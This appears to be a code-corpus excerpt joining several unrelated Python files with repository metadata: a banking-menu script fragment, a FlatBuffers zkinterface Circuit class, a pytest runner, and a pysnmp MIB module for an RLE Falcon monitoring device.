elif resp == "23":
func.emitirSaldo()
elif resp == "24":
func.emitirExtrato()
elif int(resp) < 0 or int(resp) > 24:
print("\nVocê informou um valor inválido para esta operação.\n")
print("\nOBRIGADO POR USAR O NOSSO SISTEMA!\n")
func.gravarArquivoReceitas()
func.gravarArquivoDespesas()
func.gravarArquivoCarteira()
func.gravarArquivoContas()
func.gravarArquivoSaques()
func.gravarArquivoDepositos()
func.gravarArquivoTransferencias()
func.gravarArquivoPagamentos() | true | true |
1c2cbb99091c9b3b0b32f4456810926200fcb2db | 5,545 | py | Python | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | null | null | null | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | null | null | null | zkSNARK/my_pysnark/zkinterface/Circuit.py | grakshith/zk-priv-vote | 648c1d8c90ea67ffc480376840abcf258810991e | [
"MIT"
] | 1 | 2021-03-01T08:41:35.000Z | 2021-03-01T08:41:35.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: zkinterface
import flatbuffers
# /// A description of a circuit or sub-circuit.
# /// This can be a complete circuit ready for proving,
# /// or a part of a circuit being built.
class Circuit(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsCircuit(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Circuit()
x.Init(buf, n + offset)
return x
# Circuit
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# /// Variables to use as connections to the sub-circuit.
# ///
# /// - Variables to use as input connections to the gadget.
# /// - Or variables to use as output connections from the gadget.
# /// - Variables are allocated by the sender of this message.
# /// - The same structure must be provided for R1CS and witness generations.
# /// - If `witness_generation=true`, variables must be assigned values.
# Circuit
def Connections(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
x = self._tab.Indirect(o + self._tab.Pos)
from .Variables import Variables
obj = Variables()
obj.Init(self._tab.Bytes, x)
return obj
return None
# /// A variable ID greater than all IDs allocated by the sender of this message.
# /// The recipient of this message can allocate new IDs >= free_variable_id.
# Circuit
def FreeVariableId(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
return 0
# /// Whether a constraint system is being generated.
# /// Provide constraints in R1CSConstraints messages.
# Circuit
def R1csGeneration(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
# /// Whether a witness is being generated.
# /// Provide the witness in `connections.values` and Witness messages.
# Circuit
def WitnessGeneration(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
# /// The largest element of the finite field used by the current system.
# /// A canonical little-endian representation of the field order minus one.
# /// See `Variables.values` below.
# Circuit
def FieldMaximum(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
a = self._tab.Vector(o)
return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1))
return 0
# Circuit
def FieldMaximumAsNumpy(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o)
return 0
# Circuit
def FieldMaximumLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return self._tab.VectorLen(o)
return 0
# /// Optional: Any custom parameter that may influence the circuit construction.
# ///
# /// Example: function_name, if a gadget supports multiple function variants.
# /// Example: the depth of a Merkle tree.
# /// Counter-example: a Merkle path is not config and belongs in `connections.info`.
# Circuit
def Configuration(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .KeyValue import KeyValue
obj = KeyValue()
obj.Init(self._tab.Bytes, x)
return obj
return None
# Circuit
def ConfigurationLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
return self._tab.VectorLen(o)
return 0
def CircuitStart(builder): builder.StartObject(6)
def CircuitAddConnections(builder, connections): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(connections), 0)
def CircuitAddFreeVariableId(builder, freeVariableId): builder.PrependUint64Slot(1, freeVariableId, 0)
def CircuitAddR1csGeneration(builder, r1csGeneration): builder.PrependBoolSlot(2, r1csGeneration, 0)
def CircuitAddWitnessGeneration(builder, witnessGeneration): builder.PrependBoolSlot(3, witnessGeneration, 0)
def CircuitAddFieldMaximum(builder, fieldMaximum): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(fieldMaximum), 0)
def CircuitStartFieldMaximumVector(builder, numElems): return builder.StartVector(1, numElems, 1)
def CircuitAddConfiguration(builder, configuration): builder.PrependUOffsetTRelativeSlot(5, flatbuffers.number_types.UOffsetTFlags.py_type(configuration), 0)
def CircuitStartConfigurationVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def CircuitEnd(builder): return builder.EndObject()
| 42.984496 | 157 | 0.692516 |
import flatbuffers
class Circuit(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsCircuit(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = Circuit()
x.Init(buf, n + offset)
return x
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
def Connections(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
x = self._tab.Indirect(o + self._tab.Pos)
from .Variables import Variables
obj = Variables()
obj.Init(self._tab.Bytes, x)
return obj
return None
def FreeVariableId(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint64Flags, o + self._tab.Pos)
return 0
def R1csGeneration(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(8))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
def WitnessGeneration(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(10))
if o != 0:
return bool(self._tab.Get(flatbuffers.number_types.BoolFlags, o + self._tab.Pos))
return False
def FieldMaximum(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
a = self._tab.Vector(o)
return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1))
return 0
def FieldMaximumAsNumpy(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o)
return 0
def FieldMaximumLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(12))
if o != 0:
return self._tab.VectorLen(o)
return 0
def Configuration(self, j):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
x = self._tab.Vector(o)
x += flatbuffers.number_types.UOffsetTFlags.py_type(j) * 4
x = self._tab.Indirect(x)
from .KeyValue import KeyValue
obj = KeyValue()
obj.Init(self._tab.Bytes, x)
return obj
return None
def ConfigurationLength(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(14))
if o != 0:
return self._tab.VectorLen(o)
return 0
def CircuitStart(builder): builder.StartObject(6)
def CircuitAddConnections(builder, connections): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(connections), 0)
def CircuitAddFreeVariableId(builder, freeVariableId): builder.PrependUint64Slot(1, freeVariableId, 0)
def CircuitAddR1csGeneration(builder, r1csGeneration): builder.PrependBoolSlot(2, r1csGeneration, 0)
def CircuitAddWitnessGeneration(builder, witnessGeneration): builder.PrependBoolSlot(3, witnessGeneration, 0)
def CircuitAddFieldMaximum(builder, fieldMaximum): builder.PrependUOffsetTRelativeSlot(4, flatbuffers.number_types.UOffsetTFlags.py_type(fieldMaximum), 0)
def CircuitStartFieldMaximumVector(builder, numElems): return builder.StartVector(1, numElems, 1)
def CircuitAddConfiguration(builder, configuration): builder.PrependUOffsetTRelativeSlot(5, flatbuffers.number_types.UOffsetTFlags.py_type(configuration), 0)
def CircuitStartConfigurationVector(builder, numElems): return builder.StartVector(4, numElems, 4)
def CircuitEnd(builder): return builder.EndObject()
| true | true |
1c2cbbd49f12b2029d185b0b136b5281a6fe2462 | 132 | py | Python | tests/all.py | MacHu-GWU/docfly-project | 9fdba29290d6b856a6b42dc4194f937d3e1e9326 | [
"MIT"
] | 27 | 2016-05-31T20:24:24.000Z | 2021-01-13T07:06:54.000Z | tests/s4_api/all.py | MacHu-GWU/learn_mongoengine-project | abad18032e8183859c12dc0b08942a96641538fe | [
"MIT"
] | 2 | 2018-01-31T19:32:03.000Z | 2018-01-31T20:32:33.000Z | tests/all.py | MacHu-GWU/picage-project | d5172b79c4561a553bc608da13405d8f85e20be8 | [
"MIT"
] | 18 | 2016-09-02T09:56:46.000Z | 2019-05-08T02:41:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
if __name__ == "__main__":
import pytest
pytest.main(["-s", "--tb=native"])
| 16.5 | 38 | 0.560606 |
if __name__ == "__main__":
import pytest
pytest.main(["-s", "--tb=native"])
| true | true |
1c2cbdf0a461ff50bc83d8475b0b5a81c5dc8076 | 87,704 | py | Python | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/RLE-FALCON-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module RLE-FALCON-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/RLE-FALCON-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:49:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
TruthValue, PositiveInteger = mibBuilder.importSymbols("RFC1253-MIB", "TruthValue", "PositiveInteger")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter64, TimeTicks, NotificationType, ModuleIdentity, Counter32, Integer32, Bits, ObjectIdentity, enterprises, Gauge32, Unsigned32, IpAddress, NotificationType, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter64", "TimeTicks", "NotificationType", "ModuleIdentity", "Counter32", "Integer32", "Bits", "ObjectIdentity", "enterprises", "Gauge32", "Unsigned32", "IpAddress", "NotificationType", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
rle = MibIdentifier((1, 3, 6, 1, 4, 1, 3184))
products = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1))
falcon = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1))
falconMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1))
falconIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1))
falconIdentManufacturer = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentManufacturer.setStatus('mandatory')
falconIdentModel = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentModel.setStatus('mandatory')
falconIdentSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSoftwareVersion.setStatus('mandatory')
falconIdentSpecific = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 1, 4), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconIdentSpecific.setStatus('mandatory')
falconSystem = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2))
falconClock = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconClock.setStatus('mandatory')
falconDoorAlarmBypass = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconDoorAlarmBypass.setStatus('mandatory')
falconKeypad = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3))
falconKeypadCode1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 1), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode1.setStatus('mandatory')
falconKeypadName1 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 2), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName1.setStatus('mandatory')
falconKeypadCode2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode2.setStatus('mandatory')
falconKeypadName2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName2.setStatus('mandatory')
falconKeypadCode3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode3.setStatus('mandatory')
falconKeypadName3 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName3.setStatus('mandatory')
falconKeypadCode4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 7), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode4.setStatus('mandatory')
falconKeypadName4 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 8), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName4.setStatus('mandatory')
falconKeypadCode5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 9), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode5.setStatus('mandatory')
falconKeypadName5 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 10), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName5.setStatus('mandatory')
falconKeypadCode6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 11), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode6.setStatus('mandatory')
falconKeypadName6 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 12), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName6.setStatus('mandatory')
falconKeypadCode7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 13), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode7.setStatus('mandatory')
falconKeypadName7 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 14), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName7.setStatus('mandatory')
falconKeypadCode8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 15), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode8.setStatus('mandatory')
falconKeypadName8 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 16), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName8.setStatus('mandatory')
falconKeypadCode9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 17), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode9.setStatus('mandatory')
falconKeypadName9 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 18), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName9.setStatus('mandatory')
falconKeypadCode10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 19), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode10.setStatus('mandatory')
falconKeypadName10 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 20), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName10.setStatus('mandatory')
falconKeypadCode11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 21), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode11.setStatus('mandatory')
falconKeypadName11 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 22), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName11.setStatus('mandatory')
falconKeypadCode12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 23), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode12.setStatus('mandatory')
falconKeypadName12 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 24), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName12.setStatus('mandatory')
falconKeypadCode13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 25), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode13.setStatus('mandatory')
falconKeypadName13 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 26), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName13.setStatus('mandatory')
falconKeypadCode14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 27), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode14.setStatus('mandatory')
falconKeypadName14 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 28), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName14.setStatus('mandatory')
falconKeypadCode15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 29), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode15.setStatus('mandatory')
falconKeypadName15 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 30), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName15.setStatus('mandatory')
falconKeypadCode16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 31), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode16.setStatus('mandatory')
falconKeypadName16 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 32), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName16.setStatus('mandatory')
falconKeypadCode17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 33), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode17.setStatus('mandatory')
falconKeypadName17 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 34), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName17.setStatus('mandatory')
falconKeypadCode18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 35), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode18.setStatus('mandatory')
falconKeypadName18 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 36), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName18.setStatus('mandatory')
falconKeypadCode19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 37), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode19.setStatus('mandatory')
falconKeypadName19 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 38), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName19.setStatus('mandatory')
falconKeypadCode20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 39), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadCode20.setStatus('mandatory')
falconKeypadName20 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 3, 40), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconKeypadName20.setStatus('mandatory')
falconInputVoltage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInputVoltage.setStatus('mandatory')
falconOnBattery = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("notInstalled", 0), ("installed", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconOnBattery.setStatus('mandatory')
falconLowBatteryThreshold = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconLowBatteryThreshold.setStatus('mandatory')
falconAnalogAverage = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 60))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAnalogAverage.setStatus('mandatory')
falconInputs = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3))
falconInput1 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1))
falconInput1State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1State.setStatus('mandatory')
falconInput1Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput1Reading.setStatus('mandatory')
falconInput1Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Gain.setStatus('mandatory')
falconInput1Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Offset.setStatus('mandatory')
falconInput1Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Label.setStatus('mandatory')
falconInput1UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1UOM.setStatus('mandatory')
falconInput1HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit2.setStatus('mandatory')
falconInput1HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1HighLimit.setStatus('mandatory')
falconInput1LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit.setStatus('mandatory')
falconInput1LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1LowLimit2.setStatus('mandatory')
falconInput1RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1RlyControl.setStatus('mandatory')
falconInput1Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Delay.setStatus('mandatory')
falconInput1Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput1Hysteresis.setStatus('mandatory')
falconInput2 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2))
falconInput2State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notinstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2State.setStatus('mandatory')
falconInput2Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput2Reading.setStatus('mandatory')
falconInput2Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Gain.setStatus('mandatory')
falconInput2Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Offset.setStatus('mandatory')
